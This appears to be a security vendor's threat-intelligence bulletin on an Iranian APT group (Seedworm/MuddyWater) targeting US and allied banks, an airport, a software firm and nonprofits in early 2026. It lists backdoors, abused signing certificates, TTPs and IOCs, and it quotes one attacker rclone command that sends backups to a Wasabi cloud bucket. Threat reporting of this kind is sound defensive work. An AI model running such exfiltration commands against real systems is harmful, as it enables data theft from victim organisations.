Earlier this week we wrote a blog post on the cyber affairs amidst the US-Israel war on Iran, called Operation Epic Fury. In which we observed that there would be an elevated response from state sponsored threat actors, against the western organisations with a middle eastern presence as a retaliation for these attacks.  

However, recent analysis from threat intelligence researchers reveals a notable increase in malicious cyber activity since our last blog post which, attributed to Iranian state aligned Advanced Persistent Threat (APT) group Seedworm (also known as MuddyWater, Temp Zagros, or Static Kitten). This activity has directly affected multiple U.S. organizations across critical sectors and aligns with elevated geopolitical tensions following recent military actions in the Middle East. 

Key Findings – 

1. Targeted U.S. & Allied Organisations 

Seedworm activity, first detected in early February 2026, has been observed across several highvalue networks: 
•    A U.S. bank 
•    A U.S. airport 
•    A U.S. software company (with an Israeli presence) 
•    Nonprofit organizations in both the U.S. and Canada 
These intrusions have continued into early March, indicating an active and ongoing campaign.  

2. Newly Identified Backdoors & Malware 

Researchers identified multiple malware families deployed across victim environments: 
•    Dindoor backdoor:  
o    Previously unknown 
o    Uses the Deno JavaScript/TypeScript runtime 
o    Found across the Israeli branch of the targeted software company, the U.S. bank, and a Canadian nonprofit 
o    Signed with a certificate issued to “Amy Cherne” 
•    Fakeset backdoor (Python-based):  
o    Found in the U.S. airport and another non-profit 
o    Signed with certificates tied to “Amy Cherne” and “Donald Gay” (previously used in Seedworm malware) 
•    Stagecomp → Darkcomp malware chain:  
o    Also signed using the “Donald Gay” certificate 
o    Linked to Seedworm by major vendors including Google, Microsoft, and Kaspersky 
These malware implants demonstrate a diverse toolset and indicate deliberate supplychain, financial, and criticalinfrastructure targeting.  

3. Data Exfiltration Attempts 

In at least one case, attackers attempted to exfiltrate data from the targeted software company using Rclone to a Wasabi cloud storage bucket, though the success of this attempt remains unconfirmed.  

4. Infrastructure & Delivery 

•    Malware delivery leveraged Backblaze cloud storage servers, indicating Seedworm's use of reputable cloud infrastructure for commandandcontrol and payload distribution. 
•    Use of codesigning certificates (including previously observed malicious ones) suggests a persistent effort to appear legitimate and bypass detection. 
 
TTPs (Tactics, Techniques, and Procedures) & IOCs (Indicators of Compromise) 

MuddyWater constantly evolves to evade detection, leveraging a mix of custom malware and "living-off-the-land" techniques.  

•    Initial Access: Primarily uses spearphishing with macro-enabled documents (ZIP, PDF, XLSM), often utilizing lures like fake job offers. 
•    Execution & Persistence: Heavily utilizes obfuscated PowerShell, DLL side-loading (e.g., goopdate.dll), and RMM tools like Atera or ScreenConnect. They often compile code on target machines to avoid file-based detection. 
•    Malware Arsenal: Deploys tools such as POWERSTATS, Mori, Canopy (Starwhale), MuddyRot, UDPGangster, and Phoenix. 
•    Defense Evasion: Employs anti-analysis/anti-forensics, including sandbox detection and log clearing.  
Recent Campaigns & Developments (2025-2026) 
•    Operation Olalampo (Feb 2026): Targeted high-profile entities. 
•    Targeting: Ongoing campaigns target Western and Middle Eastern financial/government entities. 
•    Mobile: Linked to DCHSpy, a modular Android spyware. 
 


Current and Previous TTPs and Observed – 

 

1. Malware Families / Backdoors 

These malware families were observed across multiple U.S., Canadian, and Israeli victim networks: 
•    Dindoor Backdoor – a previously unknown backdoor using the Deno JavaScript/TypeScript runtime.  
•    Fakeset Backdoor – Python-based backdoor deployed in U.S. airport and non-profit networks.  
•    Stagecomp Loader → Darkcomp Backdoor – Stagecomp drops and loads Darkcomp; linked to Seedworm by Google, Microsoft, and Kaspersky 
 
2. Malicious Code-Signing Certificates 

Seedworm is known for abusing fraudulent or compromised code-signing certificates. The following were directly tied to this campaign: 
•    Certificate issued to “Amy Cherne” – used to sign Dindoor and Fakeset backdoors.  
•    Certificate issued to “Donald Gay” – used to sign Fakeset and Stagecomp malware, previously seen in Seedworm activity. 

3. Malicious or Suspicious Infrastructure 

Payload Hosting (Backblaze B2 Cloud Storage) 
Used as malware distribution servers: 
•    gitempire.s3.us-east-005.backblazeb2.com  
•    elvenforest.s3.us-east-005.backblazeb2.com  
Data Exfiltration Destination (Rclone to Wasabi Cloud Storage) 
•    Attempted exfiltration using:  
rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x 


What this shows? 

 

This campaign shows a clear intent by Iranian threat actors to infiltrate U.S. and allied networks across finance, aviation, software, and nonprofit sectors. The combination of new backdoors, known malware families, cloudbased C2, and attempted exfiltration suggests a multistage operational approach—likely aimed at longterm access, espionage, or future disruptive actions. 

 

  If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation.